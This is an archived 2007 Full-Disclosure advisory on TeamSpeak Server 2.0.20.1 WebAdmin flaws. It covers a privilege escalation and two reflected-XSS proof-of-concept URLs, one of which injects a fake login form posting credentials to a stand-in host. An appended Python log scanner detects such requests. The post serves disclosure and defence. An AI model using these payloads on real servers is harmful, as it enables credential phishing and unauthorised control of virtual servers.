full-disclosure-uk May 2007 archive

[Full-disclosure] Teamspeak Server 2.0.20.1 Vulnerabilities

From: Gilberto Ficara <g.ficara_at_nospam>
Date: Fri May 11 2007 - 13:52:43 GMT
To: full-disclosure@lists.grok.org.uk


Hi everyone,
several months ago I discovered some vulnerabilities in TeamSpeak Server WebAdmin interface.

I sent the advisory and exploit to the developers about two months ago (11 03 2007), but the server is still vulnerable today.

Affected software: Teamspeak Server 2.0.20.1

Looks like the beta build 2.0.23.15 isn't affected (or at least my exploit doesn't work on that).

  1. Privilege escalation can lead to Service Abuse or Denial of Service

TeamSpeak server is based on a "site" and multiple "virtual servers".

On each "site" there are one or more SuperAdmin users that can manage the site configuration, adding more SuperAdmin users, adding, starting, stopping or removing virtual servers or even manage each single server, by selecting it from the web interface or the text-based one.

Each virtual server has one or more ServerAdmin users that can modify virtual server parameters (like the name), adding new users for the specified server (also new ServerAdmin users) and modify user privileges relative to that virtual server.

The problem lies on the RegisteredUser privileges configuration page: in that page are listed privileges intended to be associated to the SuperAdmin role, like AdminAddServer or AdminStartServer. By activating these privileges for the RegisteredUsers role, logging in with a new RegisteredUser account and doing some simple URL tampering it is possible to CREATE, START, STOP and DELETE virtual servers to the site, without SuperAdmin access.

What is required:

  • ServerAdmin access to the web interface

Here is a simple exploit pattern:

Pages ok_box.html and error_box.html are vulnerable to common Cross Site Scripting attacks:

http://your_ts_server_here:14534/error_box.html?error_title=session expired - please
login&error_text=<form action="http://127.0.0.1:31338/own.cgi">User: <input
type="text"><br>Pass: <input type="password"><br><br><input type="submit"></form>&error_url=index.html

http://webadmin_uri:14534/ok_box.html?ok_title=%3Cscript%3Ealert('hello')%3C/script%3E

Mitigation


Disable WebAdmin access.
Upgrade to beta release.

Gilberto Ficara

(sorry for my bad English :))
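
Added example (not part of the original post and not TeamSpeak code): for operators who cannot yet disable WebAdmin or upgrade, this scans access-log lines for requests to the two pages named above whose query parameters decode to HTML markup. It assumes a reverse proxy in front of WebAdmin that writes common log format; the log entries and all function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The two WebAdmin pages the advisory names as reflecting query parameters.
BOX_PAGES = {"/ok_box.html", "/error_box.html"}
# After decoding: an opening or closing tag, or a script URL scheme.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]|javascript:", re.I)
# Request target inside a common/combined log format entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S.*?) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed entries, not real traffic
    '192.0.2.10 - - [11/May/2007:13:40:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.11 - - [11/May/2007:13:41:07 +0000] "GET /ok_box.html?ok_title=%3Cscript%3Ealert(%27hello%27)%3C/script%3E HTTP/1.1" 200 734',
    '192.0.2.12 - - [11/May/2007:13:42:30 +0000] "GET /error_box.html?error_title=session+expired&error_text=%253Cform%253E&error_url=index.html HTTP/1.1" 200 801',
    '192.0.2.13 - - [11/May/2007:13:43:02 +0000] "GET /ok_box.html?ok_title=Server+started HTTP/1.1" 200 640',
]

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded markup is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(target):
    """Return the names of parameters that carry markup on a box page."""
    parts = urlsplit(target)
    if parts.path.lower() not in BOX_PAGES:
        return []
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    return [name for name, value in pairs if MARKUP.search(decode_fully(value))]

def scan(lines):
    """Yield (line_number, parameter_names) for each flagged log entry."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            yield number, hits

if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: markup in {', '.join(names)}")
```
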



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/